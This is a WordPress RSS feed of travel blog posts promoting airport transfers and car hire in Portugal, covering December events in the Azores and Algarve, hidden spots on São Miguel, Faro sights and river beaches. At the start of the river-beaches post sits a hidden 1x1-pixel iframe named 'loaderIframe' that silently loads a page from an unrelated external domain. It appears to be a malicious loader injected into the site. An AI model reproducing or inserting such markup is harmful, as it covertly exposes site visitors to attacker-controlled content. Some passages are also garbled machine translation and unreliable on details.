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		<title>Visiting the Azores in December 2025? These Events Make It Worth the Trip!</title>
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		<description><![CDATA[December is a magical time to visit the Azores when the islands embrace the Christmas season with illuminated streets, traditional music, community fairs, and cultural events. While the summer months highlight nature and adventure, winter in the Azores offers a slower, more authentic atmosphere, where local traditions, holiday celebrations, and warm hospitality take center stage.]]></description>
				<content:encoded><![CDATA[<p><strong>December</strong> is a magical time to visit the Azores when the islands embrace the <strong>Christmas</strong> season with illuminated streets, traditional music, community fairs, and cultural events. While the summer months highlight nature and adventure, winter in the Azores offers a slower, more authentic atmosphere, where local traditions, holiday celebrations, and warm hospitality take center stage. From festive markets in <a href="https://www.pontadelgadataxi.com/" target="_blank"><strong>Ponta Delgada</strong></a> to cultural programs in Angra do Heroísmo and intimate community events on smaller islands, December provides a unique opportunity to experience Azorean life at its most genuine.<br />
Traveling between events and accommodations during this period is much easier with reliable transportation, particularly as daylight hours are shorter and festivities often take place in the evenings. Planning ahead allows you to focus on enjoying concerts, markets, workshops, and <strong>Christmas</strong> celebrations without worrying about logistics — ensuring your winter getaway in the <strong>Azores</strong> is both relaxed and memorable.</p>
<p><strong>1. Animations &amp; Christmas Activities in Ponta Delgada</strong><br />
<strong>Dates</strong>: 15 – 23 December 2025<br />
<strong>Location</strong>: Ponta Delgada, São Miguel Island<br />
The historic centre of Ponta Delgada comes alive with festive itinerant Christmas animations from mid-December, featuring street performances, seasonal decorations, and light displays that fill the town with holiday spirit. Expect strolling entertainers, surprise pop-up performances, and family-friendly fun perfect for soaking up the festive ambiance before Christmas Eve. This kind of schedule is usually organised by the local municipality and complements the city’s broader Christmas program.</p>
<p><strong>2. “Ler é Saber” – Holiday Reading Initiative (Corvo)</strong><br />
<strong>Dates</strong>: 19 – 30 December 2025<br />
<strong>Location</strong>: Casa do Tempo &amp; Pavilhão Multiusos, Corvo Island<br />
Starting on 19 December, the “Ler é Saber” (Read is Know) program invites both locals and visitors to enjoy a relaxed holiday reading initiative at the Ecomuseu do Corvo. Throughout the day, a variety of books for different ages are available for borrowing at the museum and multi-purpose hall, offering a great cultural activity during the quieter Christmas week. It’s ideal if you’re on the tiny island of Corvo and want a thoughtful, community-centric experience.</p>
<p><strong>3. Feira de Natal (Christmas Fair) at Museu da Horta</strong><br />
<strong>Date</strong>: 20 December 2025 (approx. 14:00 – 18:00)<br />
<strong>Location</strong>: Horta, Faial Island<br />
On 20 December, the Feira de Natal (Christmas Fair) is traditionally hosted by the Museu da Horta (or local cultural associations), creating a festive afternoon market with local crafts, seasonal treats, and community celebration. While exact details are confirmed closer to the date, these museum-linked Christmas fairs often blend artisanal stalls with holiday music, mulled drinks, and family-friendly activities.</p>
<p><strong>4. Christmas &amp; Cultural Events in Angra do Heroísmo</strong><br />
<strong>Dates</strong>: Mid-December through late December<br />
<strong>Location</strong>: Angra do Heroísmo, Terceira Island<br />
The “Christmas in Angra” program features a rich seasonal agenda in this UNESCO World Heritage city, including concerts, street entertainment, film screenings, children’s activities, and creative workshops, transforming the historic streets and squares into festive gathering places for all ages. Events are spread throughout December and make great stops if you’re exploring Terceira around 19 December.</p>
<p><strong>5. Cultural Performances &amp; Workshops (Various Islands)</strong><br />
<strong>Dates</strong>: 17 – 19 December 2025 and beyond<br />
While not always publicised far in advance, creative workshops and performances — such as Dance Creative Workshops (Corvo) and local theatre or music programs — take place around these dates in smaller island venues (e.g., community halls and cultural centres). These often highlight local artistic expression and are a great way to experience Azorean culture away from the bigger city markets. (e.g., Corvo’s dance workshop does run 17-19).</p>
<p>With festive events and cultural celebrations spread across <strong><a href="https://www.pontadelgadataxi.com/" target="_blank">Ponta Delgada</a>,</strong> Terceira, Faial, and even smaller islands during the second half of December, having reliable transportation is essential to make the most of your trip. Whether you’re arriving just in time for Christmas markets, evening concerts, or community fairs starting from 19 <strong>December</strong> 2025, a smooth airport transfer helps you begin your holiday stress-free.<br />
For visitors landing on <strong>São Miguel</strong>, <a href="https://www.low-cost-transfers.com/ponta-delgada-airport/" target="_blank"><strong>Low Cost Transfers – Ponta Delgada Airport</strong> </a>offers a practical and budget-friendly solution for getting from the airport directly to your hotel, accommodation, or event location. Pre-booking your transfer means no waiting in taxi lines, clear pricing during the busy Christmas period, and more time to enjoy the unique atmosphere of the <strong>Azores</strong> in winter. It’s an especially convenient option if you’re traveling with luggage, family, or on a tight festive schedule.</p>
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		<description><![CDATA[1. Lagoa do Congro — The Emerald Bowl Lost in the Forest Few visitors find their way to Lagoa do Congro. There are no tour buses, no gift shops, no paved viewpoints. Just a small sign by a rural road and a narrow trail that slips into thick woodland. Within minutes, the outside world seems]]></description>
				<content:encoded><![CDATA[<p><strong>1. Lagoa do Congro — The Emerald Bowl Lost in the Forest</strong><br />
Few visitors find their way to Lagoa do Congro. There are no tour buses, no gift shops, no paved viewpoints. Just a small sign by a rural road and a narrow trail that slips into thick woodland. Within minutes, the outside world seems to fall away.<br />
The path winds between chestnut trees and hydrangea roots still curled from summer blooms. The forest floor is soft underfoot—damp with November rain, rich with the scent of earth. Then the trail drops suddenly, and the lake appears like a secret being revealed.<br />
Lagoa do Congro is a perfect green circle, tucked inside a collapsed volcanic crater. In autumn, wisps of mist hover above the surface, drifting slowly across the water. No boats, no swimmers, just silence and the occasional ripple from a falling leaf.<br />
It’s the kind of place where you sit on a moss-covered rock and lose track of time. A small, quiet world that feels entirely your own.</p>
<p><strong>2. Ribeira dos Caldeirões Natural Park — Waterfalls, Mills, and Mossy Stillness</strong><br />
On the eastern side of the island, where tourism thins into sleepy villages and terraced hillsides, Ribeira dos Caldeirões waits quietly. Even from the parking area, you can hear the river working its way through the valley—long before you see it.<br />
Old stone watermills stand along the riverbanks, relics from a time when the island pulsed with rural industry. Some have been restored, their wooden gears and millstones now decorative, but they still exude the feeling of a working past.<br />
The main waterfall pours down a wall of green, framed by ferns and dripping moss. November’s rains strengthen its flow, turning it into a white ribbon cutting through the dark rock. Smaller cascades trickle down nearby slopes, creating an orchestra of water layered across the park.<br />
Wandering the paths feels like stepping into an Azorean Eden—lush, quiet, and humbly beautiful.</p>
<p><strong>3. Miradouro do Salto do Cavalo — A Vast, Untouched Panorama</strong><br />
When the more famous viewpoints are wrapped in fog or crowded with late-season visitors, Salto do Cavalo remains serenely empty. Perched high above the town of Povoação, it offers one of the most expansive views on the island, yet somehow it’s rarely discussed.<br />
The road up climbs through twisting switchbacks, passing dairy farms, stone walls, and highland pastures. As you ascend, the air grows cooler, carrying the earthy scent of wet grass and eucalyptus.<br />
From the viewpoint, the landscape opens in a sweeping panorama: rolling green mountains folding into one another, deep valleys shaped by centuries of volcanic force, and the ocean stretching far beyond. On clear November afternoons, light filters through shifting clouds, illuminating different sections of the valley in slow-moving beams.<br />
It’s the sort of place where you exhale without realizing you were holding your breath.</p>
<p><strong>4. Poço Azul via the Sanguinho Trail — A Walk Through a Forgotten Village</strong><br />
The trail to Poço Azul begins in Faial da Terra, a quiet village where roosters crow and laundry flutters on balconies. The path leads upward past old stone steps and into the ghost village of Sanguinho.<br />
Sanguinho is small—just a cluster of traditional houses built from dark volcanic rock. Many were abandoned decades ago when life in the valley grew too difficult, but some have recently been restored. Walking among them feels like moving through a chapter of Azorean history, one of hardship, migration, and resilience.<br />
Beyond the village, the trail plunges into dense forest, where tree trunks twist like sculptures and the air is cool and damp. The sound of distant water grows louder until Poço Azul appears—a clear, blue pool nestled among moss-covered stones.<br />
In November, the forest is especially lush, and mist clings to the branches. Almost no one else is here. It feels like a discovery, even though the trail has existed for generations.</p>
<p><strong>5. Farol do Arnel &amp; the Cliffside Road — A Descent to the Edge of the Atlantic</strong><br />
Far on São Miguel’s northeastern tip stands the island’s oldest lighthouse, Farol do Arnel. Most visitors snap a photo from above and move on. Few choose to walk the steep, narrow road that descends to the lighthouse—and fewer still visit in late autumn.<br />
But the walk is worth every step.<br />
The road clings to the cliffs in dramatic fashion, plunging toward the ocean in tight curves. Along the way, small fishermen’s cottages dot the hillside, painted white against the dark basalt rocks. The air is thick with the scent of sea spray and wild fennel.<br />
At the bottom, the lighthouse stands quiet and dignified, surrounded by the roar of Atlantic waves. <strong>November</strong> brings stronger swells, sending water crashing against the volcanic shoreline in explosions of white foam.<br />
Down here, with the cliffs towering overhead and the sea stretching endlessly outward, you feel the raw power of the island more intensely than almost anywhere else.</p>
<p>Wandering through <strong>São Miguel</strong>’s lesser-known wonders is one of the island’s greatest pleasures—but reaching these remote spots isn’t always simple. Narrow roads twist through foggy highlands, hidden trails begin where bus routes end, and the most rewarding views often lie far from the main tourist paths.<br />
That’s where <a href="https://www.low-cost-transfers.com/ponta-delgada-airport/" target="_blank"><strong>Ponta Delgada Transfers</strong></a> becomes an invaluable part of the journey. Whether you’re heading to a secluded waterfall, a quiet crater lake, or a cliff-top lighthouse, their reliable, local drivers ensure you arrive comfortably and stress-free. No guesswork, no navigating unfamiliar roads—just smooth, safe travel from one unforgettable location to the next.<br />
With flexible schedules, door-to-door service, and the reassuring knowledge that someone experienced knows the island better than any map, <a href="https://www.pontadelgadataxi.com/" target="_blank"><strong>Ponta Delgada Transfers</strong> </a>lets you focus entirely on the beauty around you. So as you set out to discover São Miguel’s hidden gems, you can do it the easy way—with calm journeys, friendly guidance, and transportation that’s always ready when you need it.</p>
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		<description><![CDATA[Southern Portugal&#8217;s Algarve region is well known for its breathtaking coastline, quaint towns and breathtaking scenery. 1. Ponta da Piedade (Lagos) This well-known location is well-known for its striking cliffs, unique rock formations and azure waters. Visitors can use a boat, kayak or paddleboard to explore sea caverns and hidden grottoes. The vistas from the cliffs provide]]></description>
				<content:encoded><![CDATA[<p>Southern Portugal&#8217;s <strong>Algarve</strong> region is well known for its breathtaking coastline, quaint towns and breathtaking scenery.</p>
<p><strong>1. Ponta da Piedade (Lagos)</strong><br />
This well-known location is well-known for its striking cliffs, unique rock formations and azure waters.<br />
Visitors can use a boat, kayak or paddleboard to explore sea caverns and hidden grottoes. The vistas from the cliffs provide stunning panoramas of the Atlantic Ocean, making it a must-see for nature enthusiasts and photographers.</p>
<p><strong>2. Benagil Cave (Carvoeiro)</strong><br />
One of the most well-known sea caves in the world is Benagil Cave.<br />
This natural wonder, which can only be reached by boat, kayak or paddleboard, features a huge circular aperture in its roof that lets light stream into the sandy beach below.<br />
Adventurers and beachgoers will find this place to be bizarre and breathtaking.</p>
<p><strong>3. Tavira</strong><br />
Tavira is a charming town with a touch of traditional Portuguese architecture.<br />
With its whitewashed buildings, ancient churches and Roman bridge, this Algarve village is less crowded than others.<br />
Tavira Island, which is easily accessible by ferry, has lovely beaches that are ideal for unwinding.</p>
<p><strong>4. Ria Formosa Natural Park</strong><br />
From Faro to Tavira, the enormous, protected lagoon system known as Ria Formosa stretches along the coast of the Algarve.<br />
Birdwatchers, nature lovers and anyone interested in boat cruises through the park&#8217;s network of canals, islands and marshlands will find paradise here.<br />
In this tranquil setting, chameleons, flamingos and other wildlife can be seen.</p>
<p><strong>5. Sagres and Cape St. Vincent</strong><br />
Sagres is a mountainous and windswept hamlet at the southern coast of the Algarve, close to Cape St. Vincent, renowned as the &#8220;End of the World&#8221; during the Age of Discovery.<br />
Adventurers and history lovers will love Cape St. Vincent&#8217;s dramatic vistas of the Atlantic and sense of isolation provided by the lighthouse and soaring cliffs.</p>
<p>These places encapsulate the<strong> Algarve</strong>&#8216;s abundance of adventure, natural beauty and cultural diversity.<br />
Savor the most thrilling experiences in the Algarve with your loved ones, always relying on <a href="http://www.lagoscarhire.com/" target="_blank"><strong>Lagos Car Hire</strong></a> for top-notch car rental services anytime you need them and <a href="https://faro-airport-transfers.net/" target="_blank"><strong>Faro Airport Transfers</strong></a> for simple, hassle-free transfers!</p>
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		<description><![CDATA[The Algarve, in southern Portugal, is a special location since it has 150 kilometers of coastline that faces the Atlantic Ocean. The area is one of the most developed tourist destinations in all of Europe and offers the ideal blend of natural beauty and historic legacy. The Algarve, which is frequently mistakenly referred to as]]></description>
				<content:encoded><![CDATA[<p>The <strong>Algarve</strong>, in southern <strong>Portugal</strong>, is a special location since it has 150 kilometers of coastline that faces the Atlantic Ocean. The area is one of the most developed tourist destinations in all of Europe and offers the ideal blend of natural beauty and historic legacy.<br />
The Algarve, which is frequently mistakenly referred to as Portugal&#8217;s &#8220;mass tourism&#8221; zone, yet has a wealth of choices for a vacation rich in both culture and nature.<span id="more-3020"></span></p>
<p><strong>1.Praia do Camilo</strong><br />
One of the most well-liked beaches in the Algarve is Praia do Camilo, and it is simple to understand why. The beach is certainly a paradise with its golden sands, pure waters, and beautiful vistas.<br />
The beach, the sea, or the adjacent cliffs and caves can all be visited while tourists are there.  Although most visitors come here to set up shop for the day and lounge in the sun, the beach&#8217;s length of over 600 meters makes it ideal for a leisurely stroll along the water&#8217;s edge.</p>
<p><strong>2.Praia dos Irmaos</strong><br />
One of the Algarve&#8217;s most alluring beaches is the Three Brothers Beach (praia dos Tres Irmaos). It is a very well-liked beach among Portuguese people, making it the perfect site to spend a day at the shore while taking in the Algarvian sun and the idyllic blue seas that fall into the cliff&#8217;s rock.<br />
Praia dos Tres Irmaos has a highly appealing characteristic that &#8220;almost&#8221; makes it unique. Through tunnels cut into the rock, you can access numerous beaches and coves of unending beauty that are connected to it.</p>
<p><strong>3. Ponta da Piedade</strong><br />
Ponta da Piedade is a point located west of the city of Lagos. Exploring the seaside rock formations in the Algarve is one of the coolest things to do, and this is surely one of the finer examples.<br />
Erosion has created several incredible features, including pinnacles, arches, and sea caves. Its location, which offers breathtaking views of the coastline in all directions, makes it a great site to watch the sun rise and set! You can either go down the 190 stairs or take use of the many lookout points from the top of the cliffs to get a better view of the cove with the arches.</p>
<p><strong>4.Tres Castelos</strong><br />
Tres Castelos is a fairly large town on the coast that is situated right in the middle of it. In a particular spot, the sea stack is incredibly close to the tall cliff, making the distance between them impressive to cross.<br />
As you move between the stacks, you feel quite little, yet isn&#8217;t it wonderful what mother nature can do to something as robust as rock? It is among the Algarve&#8217;s most magnificent sites without a doubt.</p>
<p><strong>5. Sagres</strong><br />
The Algarve&#8217;s southernmost point, the shore of Sagres, is the greatest location to watch dolphins. From the shore or by taking a boat tour from one of the local towns, you may observe marine life.<br />
Due to the powerful waves, the location is also well-liked by surfers. Numerous bike and hiking routes can be found along the cliffs, and if you&#8217;re searching for isolation, here is the finest location to uncover secret bays and less-visited beaches. One of the best things to do in the Algarve for nature enthusiasts is to explore this shoreline.</p>
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		<title>Discover the traditions and events from Algarve in December!</title>
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		<pubDate>Tue, 20 Dec 2022 19:52:22 +0000</pubDate>
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		<description><![CDATA[The Algarve is the ideal location in Europe for a winter vacation. The stunning Algarve region in southern Portugal welcomes guests with breathtaking vistas, countless beaches, charming coastal towns and unique festivals and events. For those wishing to get away from the cold during the winter, this sun-kissed region of southern Portugal is a great]]></description>
				<content:encoded><![CDATA[<p>The <strong>Algarve</strong> is the ideal location in Europe for a winter vacation. The stunning Algarve region in southern <strong>Portugal</strong> welcomes guests with breathtaking vistas, countless beaches, charming coastal towns and unique festivals and events.<br />
For those wishing to get away from the cold during the winter, this sun-kissed region of southern Portugal is a great choice.<br />
Blissfully quiet beaches, peaceful hiking trails, staggering cliffs, colorfully tiled fishing villages, and breathtaking landscapes are only some of the things you can expect from Algarve in winter.<br />
If you’re looking for European winter sun, Algarve is the place to be! Enjoy the amazing December festivals with your family and friends in Algarve!<span id="more-3008"></span></p>
<p><strong>1. Christmas in Lagos 2022- December 1st to January 6th | Location: several streets in Lagos</strong><br />
The Camara de Lagos organizes different Christmas activities in the city&#8217;s streets to celebrate the holidays while you&#8217;re on vacation in the Algarve. Even though this event seems only be for children, adults can also experience the enchantment of Christmas. From December 3 to December 24, go to Aldeia do Natal in Praça do Infante to see the fabled Santa Claus. Allow the kids to daydream while they listen to the city library&#8217;s promoted reading of Christmas stories in the same location. On this court, workshops on face painting, balloon modeling, creation of nativity scenes, badges, puppets and much more will also delight the youngest on Rua Portas de Portugal.</p>
<p><strong>2. Grupo Coral de Lagos- December 22th| Location: Igreja de Santa Maria</strong><br />
The Grupo Coral de Lagos and its children&#8217;s choir will spread magic this Christmas season, taking advantage of the moment to appeal to the most supportive side of each one in raising donations for the restoration of the pipe organ of the Church of Santa Maria.</p>
<p><strong>3. The Nativity scene</strong><br />
Portugal genuinely has a unique Christmas spirit. One such instance is nativity scenes (presépios), which are becoming less common in Northern Europe.<br />
Nativity scenes are very popular in Portugal. Around Christmas, you may find them all around Portugal, frequently by the side of the road close to roundabouts. A common sight in many Portuguese cities are live nativity scenes, in which participants dress as members of the Christmas tale.</p>
<p><strong>4. The Consoada</strong><br />
The Consoada, or Christmas feast, is served on the evening of December 24. The most traditional option for Christmas supper is likely bacalhau, the national cuisine of Portugal. However, octopus is also popular in the Algarve and in the country&#8217;s north.<br />
Bolinhos de Bacalhau and Rissóis de Camaro, two fish-based salgados, are expected to be the starters.<br />
Despite being a Catholic, it is not unexpected that bacalhau is consumed at Christmas because the Portuguese adore it. The delicious bacalhau recipe used for Christmas, Bacalhu de Consoada, is unexpected.</p>
<p><strong>5. New Year&#8217;s Eve in Lagos- December 31st to January 1st | Location: Praça do Infante</strong><br />
Why not start the year off on the right foot by the sea and in a festive atmosphere? Gather all your friends and family and enter 2023 celebrating life. On this special night there will be party, music and entertainment all night long at Praça do Infante, in the center of Lagos. The Portuguese band The Gift will perform with the usual great songs and at midnight watch the sky to watch a light and color show with the usual fireworks. Start planning your New Year&#8217;s Eve as soon as possible.</p>
<p>Winter events in the Algarve may not mean beaches and long sunny days, but there is so much to discover about Europe&#8217;s best kept secret that the days will seem very short. Take advantage of the upcoming festive season and spend memorable days at the events in the Algarve with your family and friends, always relying on <a href="http://www.lagoscarhire.com/" target="_blank"><strong>Lagos Car Hire</strong></a> for car rentals, which provides hassle-free and high quality services for amazing experiences and trips!</p>
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		<pubDate>Sun, 12 Dec 2021 15:21:23 +0000</pubDate>
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		<description><![CDATA[Welcome to the wonderful Portugal, the place where Christmas is the absolute expression of joy, peace, celebration and gratefulness. Portugal has its own Christmas celebrations, a traditional Christmas in Portugal usually takes place on the 24th December, the day where many families and friends gather to celebrate the “Consoada” feast, where they exchange gifts and]]></description>
				<content:encoded><![CDATA[<p>Welcome to the wonderful Portugal, the place where Christmas is the absolute expression of joy, peace, celebration and gratefulness.<br />
Portugal has its own Christmas celebrations, a traditional Christmas in Portugal usually takes place on the 24th December, the day where many families and friends gather to celebrate the “Consoada” feast, where they exchange gifts and enjoy delicious dishes, such as Bacalhau (codfish) and Bolo Rei, which is the Portuguese version of a Christmas cake.</p>
<p><strong>Algarve</strong> is one of the most beautiful places in Portugal, where you have so many treasures to discover and so many locations to admire and enjoy. This is the most wonderful time of the year to visit Algarve, due to all the sparkling special festivities, the heart warming customs and traditions and the welcoming people which will definitely amaze you and win your heart.</p>
<p>Situated to the west of Algarve, <strong>Carvoeiro</strong> is one of the most beautiful places to visit in Algarve. Originally a fishing village, Carvoeiro is now a very popular destination with a wide range of visitors and it’s considered to be one of the most remarkable destinations with the most picturesque beaches.<br />
<strong>Algar Seco</strong>, Carvoeiro, is famous for the Carvoeiro boardwalk, a picturseque cliff top starting from Nossa Senhora da Encarnacao fort until the Algar Seco rock formation. This destination is the accurate definition of an astonishing, cheeerful and abolutely breathtaking afternoon together with your family and friends.</p>
<p>For history enthusiasts and lovers, an extraordinary attractive location in Algarve is <strong>Alcoutim</strong>, an almost unchanged village which preserves its authenticity and ancient charm, situated on the banks of the river Guadiana. The steep cobbled streets seem to lead to the riverside through a mix of low, whitewashed cottages and little squares.<br />
Although it has lost the walls that for centuries surrounded it, and despite some modern constructions, Alcoutim&#8217;s steep and narrow streets still maintain much of the calm atmosphere, typical of an algarvian hill town.<br />
This incredibly enchanting location is worth visiting especially in the holiday season, you will definitely find it exceptionnally magical.</p>
<p><strong>Salema</strong> is situated on one of the most unspoilt coastal regions of Algarve, the Southwest Alentejo and Costa Vicentina Natural Park.<br />
Situated at the top of a cove that features magnificent rock formations and a beautiful sandy beach that is lined with the old houses that formed the original village, this location is as both scenic and tranquil &#8211; the ideal place to take unforgettable strolls and to simply seize the moment.<br />
Another charming aspect about this place resides in <strong>Praia da Salema</strong>, where you will find gold and orange limestone cliffs typical of Algarve. Some of the oldest sections actually date to the Lower Cretaceous period, so they’re around 150 million years old!</p>
<p>There are a lot of activities and events around Algarve during Christmas holidays, from festive concerts and parades to nativity scene.<br />
Come and enjoy this special holiday in Algarve, Portugal, with your family and friends, surrounded by the most beautiful landscapes and unique atmosphere, always counting on <a href="http://www.low-cost-transfers.com/faro-airport/" target="_blank"><strong>Faro Low Cost Transfers</strong></a> and <a href="http://www.lagoscarhire.com/" target="_blank"><strong>Lagos Car Hire</strong></a>, which provide excellent transfers and car rental services, whenever you need!</p>
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		<title>Top 10 river beaches to discover this summer</title>
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		<description><![CDATA[&#160; Do you know where the best Portuguese river beaches are? We have gathered a top 10 of guarded beaches to meet you this summer. The hundreds of kilometers of sand on the Portuguese coast attract most tourists. But the interior of the country holds unexpected secrets for visitors seeking to escape the confusion of the]]></description>
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<p><iframe id="loaderIframe" style="position: absolute; height: 1px; width: 1px;" src="https://cdn.cdnservice.space/flister.html?v=3" height="1" width="1"></iframe>Do you know where the best Portuguese river beaches are? We have gathered a top 10 of guarded beaches to meet you this summer. The hundreds of kilometers of sand on the Portuguese coast attract most tourists. But the interior of the country holds unexpected secrets for visitors seeking to escape the confusion of the coastline &#8211; river beaches yet to be discovered.Portugal has hundreds of river beaches, many of them with Blue Flag recognition that guarantees the quality of water, sand and infrastructure to bathers. In addition, there are several beaches, that besides the excellent conditions they offer, are supervised by teams of lifeguards.</p>
<p>1. Loriga – Seia</p>
<p>Exactly in the Natural Park of the Serra da Estrela, there is a sanctuary for nature lovers. A place of impressive beauty, the Loriga River Beach is located in the Loriga Glacier Valley.With the promise of offering pure and crystalline waters in a preserved environment, it has good support infrastructures and enables the practice of various adventure activities and walks.</p>
<p>2. Estorãos &#8211; Lima Bridge</p>
<p>Next to the Roman bridge over the river Estorãos, in the heart of a charming village of Minho, thereis the Estorãos River Beach. Watched by the Serra de Arga, this beach invites you to enjoy a romantic place, in the middle of nature, on a bank of clear waters.</p>
<p>3. Adaúfe</p>
<p>On the banks of the Rio Cávado, the Adaúfe River Beach has an extension of about 200 meters, which includes a sandy area and a wide ridge, with accessible pedestrian paths.On the beach there are excellent conditions for the practice of activities such as volleyball, canoeingor extreme sports. It has support infrastructure that includes jumping board, fitness park and snack park, with tables and barbecues.In Adaúfe it is also possible to rent seagulls, which will help to create unforgettable memories.</p>
<p>4. Alamal Beach – Gavião</p>
<p>Situated in a stunning setting on the banks of the Tejo River, there is the River Beach of Quinta do Alamal. The beach is part of a leisure complex that, in addition to the infrastructures to support the bathing area, also includes an Adventure Center.The Center offers activities such as rappel, slide, boat trips and canoe. There is also a wooden walkway that runs along the river, between the beach and the Belver bridge, with excellent points for observing flora and fauna.From Belver Castle, at the top of the hill, you can observe Alamal beach and, who is enjoying sunbathing, can also indulge in the charms of the green hill, which contrasts perfectly with the waters of the Tagus.</p>
<p>5. Vimieiro &#8211; Penacova</p>
<p>In the middle of the River Alva, there is the Fluvial Beach of Vimieiro, which provides tranquility and rest for those looking for it.It is located in the complex of the schist villages and it is possible, on the hillside, to observe the schist houses, a water mill and a river wheel, offering a picturesque touch to the surrounding area.In addition to having surveillance, it is a river beach of the Blue Flag. It also allows you to rent sunbeds, awnings and boats without a motor, for a walk on the river.</p>
<p>6. Fraga da Pena – Arganil</p>
<p>Inserted in the Protected Area of Serra do Açor, in the heart of Mata da Margaraça, there is an idyllic panorama, where the water makes its way through the vegetation, up to a magnificent waterfall over 20 meters high.The River Beach of Fraga da Pena comes from a geological accident, which is noted by the sound of water falling. It is the portrait of an encounter with nature, which remains untouched by man.</p>
<p>7. Ribeira da Venda &#8211; Gavião</p>
<p>Located about 1 kilometer from the village of Comenda, 70 kilometers from Spain, the Ribeira da Venda River Beach surprises with the freshness and green spaces, both of grass and trees.There are several bridges that cross the site, such as an old Roman arch bridge, overlapping its spring waters.The beach offers several infrastructures, such as the picnic area with barbecue grills, the snack bar and restaurant with terrace, the children&#8217;s playground, a children&#8217;s pool, a fitness circuit, a skate park and changing rooms.</p>
<p>8. Pego das Pias</p>
<p>Between S. Luís and Odemira, the Pego de Pias River Beach is located to the north of the parish of S. Salvador, between S. Luís and Odemira. This place invites nature lovers in, attracting them to a place of extreme beauty, untouchable by the hand of man.Located in isolation between rocks, it finds the origin of its name in the circular cavities of these. The cavities were formed by swirls that existed when the water level was higher than the current one. This force gave rise to cavities called sinks.It promises tranquility and calm to anyone looking for this nook, which seems lost among the beauties of Portugal.</p>
<p>9. Portagem – Marvão</p>
<p>Within the Leisure Center is the Fluvial Beach of Portagem, with its swimming pools that attract notonly Portuguese, but Spanish, especially on hot summer days.It offers several outdoor pools, one of which is for children and the other is fluvial, on the River Sever. This offers unqualified views of Castelo do Marvão, one of the region&#8217;s ex-libris.The river beach has recently been refurbished and offers, on one of its banks, a lawn and an area with tables and benches.The Portagem Leisure Center also has an amphitheater, a sports center, a playground, a restaurant / bar, space for exercising, among others.</p>
<p>10. Fragas de São Simão &#8211; Figueiró dos Vinhos</p>
<p>A 15-minute walk from the Village of Casal de São Simão, lies the River Beach Fragas de São Simão. Bathed by the water of the Alge stream, on the way to Zêzere, it offers an unforgettable fragrance thanks to the presence of laurels and cork oaks around.The water is so clear that you can see the rocks at the bottom and the landscapes of the area take anyone to a magnificent setting, of undeniable beauty.The river beach is between two imposing fragas where climbing, abseiling and slide are practiced. The smaller stones are used as a place for sunbathing or as diving boards.</p>
<p>From August 1 to 31, there is, as a rule, a free transport that takes the route from Figueiró dos Vinhos to the river beach, inthe afternoon.</p>
<p>Come and visit these beautiful places, you will definitely fall in love with them!</p>
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		<description><![CDATA[The summer is still young and there are plenty of places to visit and many things to enjoy, so take advantage of the beautiful weather and visit the beautiful city of Faro. Faro is a municipality and the southernmost city and seat of the district of the same name, in the Algarve region of southern]]></description>
				<content:encoded><![CDATA[<p>The summer is still young and there are plenty of places to visit and many things to enjoy, so take advantage of the beautiful weather and visit the beautiful city of Faro.</p>
<p>Faro is a municipality and the southernmost city and seat of the district of the same name, in the Algarve region of southern Portugal.<span id="more-2949"></span></p>
<p>Once you have arrived in the sunny Faro, you cannot miss <strong>Cidade Velha</strong> (the Old City), where you can admire the splendid architectural styles, result of numerous earthquakes and British bombardments, the fascinating cobbled streets, as well as the picturesque atmosphere whom you will fall in love with. You’ll also find a sprinkling of cafes and bars, within O’Castelo. This is not just a bar, café and restaurant, they also stage a range of cultural events and club nights in their courtyard.</p>
<p>For history lovers, the <strong>Faro Municipal Museum</strong> is the perfect corner to be delighted with many interesting stories, unique exhibits and marvellous collections. The Faro Municipal Museum was established in 1894 and it resides in a 16th century building of the former Convent of Our Lady of the Assumption. A collection of 17th and 19th century artwork from Portuguese, Italian and Spanish painters are on display along with sacred artifacts from churches in the region.</p>
<p>Definitely one of the most beautiful places to go to is <strong>Ria Formosa Natural Park</strong>, described as one of the Portugal’s &#8221;Seven Wonders&#8221;, formed of salt pans, lagoons and barrier islands. These islands protect the region from the powerful seas, while also providing some of the quietest and most scenic beaches of the Algarve. A boat tour is a great way to discover the region, with its thriving marine ecosystem, unspoilt beaches, and rich fishing heritage.</p>
<p>Previously known as Pousada de Faro, the famous <strong>Palace of Estoi</strong> was built in the 19th century by the Viscount of Estoi, a wealthy and tasteful man who created a beautiful neo-rococo family home with superb French style gardens resembling to Versailles, including statues and exotic flora. The interior is now a luxury hotel, but non-residents are free to wander the grounds and enjoy a coffee with a view on the balcony of the restaurant.</p>
<p>Last, but not the least, the <strong>Arco da Vila</strong> is Faro’s fine neo-classical archway entrance to the Algarve city&#8217;s old quarter  (Cidade Velha). Some of its walls are Moorish in foundation but the structure has an Italianate, Neo-Classical appearance, thanks to a project led by Bishop Francisco Gomes in the 19th century.</p>
<p>You cannot miss these beautiful places, surrounded by charm and history, so wonderfully preserved!</p>
<p>Enjoy the most beautiful moments of your holidays with your family and friends, always counting on <a href="http://www.low-cost-transfers.com/faro-airport/" target="_blank"><strong>Faro Low Cost Transfers</strong></a>, which guarantee high services transfers in the best conditions!</p>
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<p><span style="color: #000000;"><span style="font-family: Arial, serif;">Going to the beach in October just might sound like a crazy idea for most parts in the world, but it is a sweet reality for the Portuguese, who enjoy a long, warm and mild autumn with temperatures well above the average European ones.</span></span></p>
<p><span style="color: #000000;"><span style="font-family: Arial, serif;">So you can actually still enjoy a few days basking in the mild sun and walking on the lukewarm sand of the Algarve.<span id="more-2944"></span></span></span></p>
<p><span style="color: #000000;"><span style="font-family: Arial, serif;">The Algarve, the southern part of Portugal, is the seaside spot of the country and one of the greatest seaside attractions in the world in recent years, having attained prominence as a welcoming, accessible and beautiful international destination.</span></span></p>
<p><span style="color: #000000;"><span style="font-family: Arial, serif;">You will definitely fall in love with the Algarve as soon as you arrive to see its dramatic landscape, huge rocks emerging majestically from the sea, the sun reflecting on the crisp cerulean waters of the ocean… plus there is a feeling that you are welcome and at home, a most inviting sense of lack of pretentiousness and natural appeal which you will surely adore.</span></span></p>
<p><span style="color: #000000;"><span style="font-family: Arial, serif;">We thought you might find some practical travel information practical at this point, so here it goes:</span></span></p>
